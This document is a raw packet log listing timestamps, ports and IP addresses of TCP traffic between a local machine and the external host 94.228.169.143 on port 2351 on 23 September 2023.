Sep 23, 2023 08:02:05.458126068 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458174944 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.458306074 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458448887 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458503008 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.458534002 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458570957 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458606005 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458614111 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.458673954 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458709955 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458720922 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.458776951 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458826065 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.458864927 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.458970070 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.459009886 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.459017038 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.459069967 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.459115982 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.459116936 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.459167004 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.459207058 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.510917902 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.510991096 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.511065960 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.777838945 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.777904987 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.777944088 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.777982950 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.777986050 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778031111 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.778111935 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778150082 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778187990 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778193951 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.778228998 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778275013 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.778372049 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778414011 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778460979 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.778497934 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778538942 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778582096 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.778588057 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778661966 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778702974 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.778747082 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778824091 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.778865099 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.779360056 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.779512882 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.779556990 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.779597998 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.779803991 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.779846907 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.780608892 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.780669928 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.780714989 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.780725002 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.780797958 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.780837059 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.780847073 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.780896902 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.780947924 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.780963898 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781013012 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781056881 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.781071901 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781091928 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781130075 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.781156063 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781224966 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781269073 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.781426907 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781490088 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781506062 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781538010 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.781605959 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781625032 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781650066 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.781687975 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781730890 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.781733990 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781800985 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781843901 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.781927109 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.781965971 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.782008886 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.782026052 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.782058001 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.782098055 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.782104015 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.782160044 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.782205105 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.782217026 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.782274008 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.782314062 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:05.832417011 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.832699060 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:05.832793951 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.099708080 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.099776030 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.099812984 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.099850893 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.099894047 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.099930048 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.099967957 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100007057 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100042105 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100079060 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100112915 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100150108 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100186110 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100228071 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100267887 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100303888 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100450039 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100486040 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100569010 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100760937 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100826025 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.100970030 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.101031065 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.101067066 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.101984978 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102000952 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102075100 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102158070 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102188110 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102214098 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102278948 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102294922 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102385044 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102484941 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102519989 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102570057 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102653027 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102679968 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102863073 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102879047 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102895021 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102917910 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102932930 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.102988005 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103037119 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103055954 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103121042 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103180885 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103223085 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103250027 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103368998 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103384972 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103442907 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103507996 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103636026 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103712082 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103745937 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103789091 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103846073 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103898048 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103955984 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.103972912 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104059935 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104077101 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104343891 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104387999 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104439020 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104532957 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104619980 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104759932 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104827881 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104856014 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104923964 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104964972 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.104980946 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.105082989 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.109638929 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.109863997 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.109922886 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.110131979 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.154139042 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.154158115 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.154247046 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.431905031 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.431972980 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432013988 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432050943 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432096004 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432132959 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432172060 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432183981 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.432183981 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.432183981 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.432329893 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432370901 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432462931 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432559967 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432600975 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432636023 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432712078 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.432712078 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.432806969 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432847977 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432917118 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.432952881 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433046103 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433063984 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.433083057 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433100939 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.433182001 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433233023 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.433286905 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433324099 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433372974 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.433414936 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433510065 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433556080 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.433595896 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433634043 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433675051 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433686972 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.433743000 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433787107 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.433810949 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433851004 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433886051 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.433897018 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.434052944 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434091091 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434118986 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.434125900 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434182882 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.434253931 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434519053 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434581041 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434592962 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.434617996 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434648037 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434657097 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.434678078 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434704065 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434720039 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.434732914 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434758902 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434772015 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.434837103 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434856892 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434876919 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.434878111 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.434911966 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.435061932 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435121059 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435159922 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.435287952 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435301065 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435342073 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.435360909 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435383081 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435416937 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.435436010 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435491085 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435542107 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.435549021 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435564041 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435599089 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.435627937 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435754061 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435801029 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.435822010 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435834885 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.435873032 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.436069012 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436235905 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436249018 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436283112 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.436409950 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436450958 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436455965 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.436520100 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436533928 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436562061 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.436616898 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436642885 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436659098 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.436758995 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436805010 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.436810017 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436872005 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.436917067 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.437022924 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.437083006 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.437120914 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.437133074 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.437200069 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.437239885 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.479844093 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.479867935 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.479926109 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.755233049 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755278111 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755315065 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755350113 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.755363941 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755402088 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755414963 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.755481005 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755517960 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755527973 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.755664110 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755711079 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.755763054 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755949020 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.755987883 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756002903 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.756059885 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756108999 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.756150961 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756222010 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756273985 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.756319046 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756390095 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756427050 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756441116 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:06.756464005 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:06.756508112 CEST	49714	2351	192.168.2.3	94.228.169.143
